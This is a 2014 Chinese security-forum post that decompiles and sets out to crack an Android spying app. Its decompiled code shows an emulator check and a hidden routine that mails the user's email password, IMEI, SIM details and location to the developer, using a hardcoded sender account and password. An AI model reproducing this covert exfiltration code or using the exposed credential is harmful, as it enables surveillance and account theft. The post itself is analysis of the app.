首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. Android安全
    3. 发新帖
3
[原创]某通信监控软件爆破分析
发表于: 2014-12-17 02:26 19390

[原创]某通信监控软件爆破分析

huangyalei 活跃值
2014-12-17 02:26
19390

注:本APP会有杀软报毒,不过其本身就类似木马,介意的朋友请慎下。

使用用具:APKIDE(改之理)
          IDA Pro
          Arm汇编转换器
          UltraEdit

    先运行软件,出来启动界面后居然退出了,我用的2.2版本Android SDK模拟器,是不是版本问题?换了4.x的,现象依然一样,第一反应是APP检测了模拟器环境。
    那么就反编译出来看看吧。将软件apk用APKIDE反编译,看起来很顺利,分析AndroidManifest.xml,找到主Activity为com.vipios.activity.MainActivity,找到相应目录下的MainActivity.smali,打开,很长很不直观啊,看看Java代码吧,打开Java源码的菜单居然灰色不可选,看着反编译出来的类名和smali内容很工整啊,没有混淆过,不甘心啊。
    是什么问题呢?dex中有什么猫腻呢?IDA Pro是时候该出场了。将apk拖入IDA,选择classes.dex进行分析。既然是来找问题的,分析完直接Ctrl-Q查看问题代码,看到吗,不少哦!

    点击第一处CODE,看到的代码不知所云,Source file也没解析出来:

    这部分代码所属public java.lang.String android.a.a()对应smali\android\a.smali文件,在APKIDE中打开,看到source "\nSDK\u7248\u672c:",这个明显是为了干扰反编译程序植入的垃圾代码,直接删除a.smali。
    余下的问题代码同样处理,删除完垃圾smali后,在APKIDE中编译通过,然后再反编译刚才编译出来的apk,打开Java源码的菜单可选了,打开看看,很漂亮的代码,Bingo!(注:这个apk不能运行,后面的修改都是建立在原包的基础上的)

    来到MainActivity看看,onStart中调用的isMoni()这个函数从名字到长相都很可疑,看看代码:

1
2
3
4
5
private boolean isMoni()
{
  String str = ((TelephonyManager)getSystemService("phone")).getDeviceId();
  return (str != null) && (str.trim().length() != 0) && (!str.matches("0+"));
}
1
2
3
4
5
if (!OtherOperatorService.check3Gwifi(getApplicationContext()))
{
  Toast.makeText(getApplicationContext(), "先开启手机网络,以便测试邮箱是否可用", 1).show();
  return;
}
1
2
3
invoke-static {v3}, Lcom/vipios/service/OtherOperatorService;->check3Gwifi(Landroid/content/Context;)Z
move-result v3
if-nez v3, :cond_3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Thread localThread = new Thread(new Runnable()
{
  public void run()
  {
    String str1 = MainActivity.this.smtpTemp;
    String str2 = MainActivity.this.portTemp;
    String str3 = MainActivity.this.userEmailTemp;
    String str4 = MainActivity.this.userPasswordTemp;
    String str5 = MainActivity.this.userEmailTemp;
    String[] arrayOfString = new String[1];
    arrayOfString[0] = MainActivity.this.userEmailTemp;
    MailSenderInfo localMailSenderInfo = new MailSenderInfo(str1, str2, str3, str4, true, str5, arrayOfString, MainActivity.this.subject, MainActivity.this.content);
    if (new SimpleMailSender().sendHtmlMail(localMailSenderInfo))
    {
      MainActivity.testok = 1;
      MainActivity.this.userSave();
      return;
    }
    MainActivity.testok = 2;
  }
});
localThread.start();
try
{
  localThread.join();
  if (testok == 1)
  {
    Toast.makeText(getApplicationContext(), "恭喜你,保存成功", 1).show();
    setUserEditedStates(false);
    this.subject = (this.userEmailTemp + "-" + this.shoujiImei + "正在测试" + OtherOperatorService.getVersionName(this) + "版(" + getPackageName() + "-" + "" + "-" + "finspy_vip@163.com" + ")");
    this.content = ("设定邮箱:" + this.userEmailTemp + "(" + this.userPasswordTemp + ")绑定号码:" + this.userPhoneNumberTemp + ";设置功能:" + this.tonghuajiluTemp + "," + this.duanxinjiluTemp + "," + this.tonghualuyinTemp + "," + this.weizhijiluTemp + "," + this.qqjiluTemp + "," + this.weixinjiluTemp + ";发送设置:" + this.allnetTemp + "," + this.wifiTemp + ";SDK版本:" + Build.VERSION.SDK_INT + ";" + "Model型号:" + Build.MODEL + ";Android版本:" + Build.VERSION.RELEASE + "<br/>当前卡号及编码" + this.NativePhoneNumber + "," + this.IMSI + "(" + OtherOperatorService.getCardName(this.IMSI) + ")" + LocationEmailInfo.getBaiduMaplink());
    OtherOperatorService.uploadEmail(OtherOperatorService.getUserSmtp("tyling7775@yeah.net"), OtherOperatorService.getUserPort("tyling7775@yeah.net"), "tyling7775@yeah.net", "tyling132014", "tyling7775@yeah.net", new String[] { "finspy_vip@163.com" }, this.subject, this.content);
    testok = 0;
    return;
  }
}
catch (InterruptedException localInterruptedException)
{
  do
  {
    for (;;)
    {
      testok = 2;
    }
  } while (testok != 2);
  Toast.makeText(getApplicationContext(), "开启你邮箱SMTP服务(查看帮助),或邮箱或密码输入错误;或更换邮箱重试!", 1).show();
  testok = 0;
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 3
支持
分享
赞赏记录
参与人
雪币
留言
时间
飘零丶
为你点赞~
2024-5-31 04:11
shinratensei
为你点赞~
2024-5-31 03:59
PLEBFE
为你点赞~
2023-3-1 05:56
最新回复 (8)
dalerkd
雪    币: 118
活跃值: (72)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
2
好贴好贴前排学习
2014-12-17 07:41
0
Tee8088
雪    币: 510
活跃值: (588)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
私信
3
为啥写这类软件的人都喜欢取名叫什么计算器呢????
2014-12-17 09:14
0
white、、
雪    币: 60
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
好贴 给个赞。
2014-12-17 09:25
0
JackJoker
雪    币: 188
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
好帖子,学习啦。
2014-12-17 09:50
0
nence
雪    币: 102
活跃值: (50)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
6
我理解,所有的程序本质都是计算器哈哈,好帖顶一个
2014-12-17 12:30
0
zgzxp
雪    币: 578
活跃值: (858)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
大神有没有破解后的版本了
2014-12-25 14:54
0
lsniagaraI
雪    币: 36
活跃值: (30)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
8
大侠,你的IDA是什么版本,为什么我的F5没有?
2014-12-26 16:40
0
wwiff
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
这款软件是个骗局,根本不可能实现他所说的功能的
2015-2-2 16:45
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》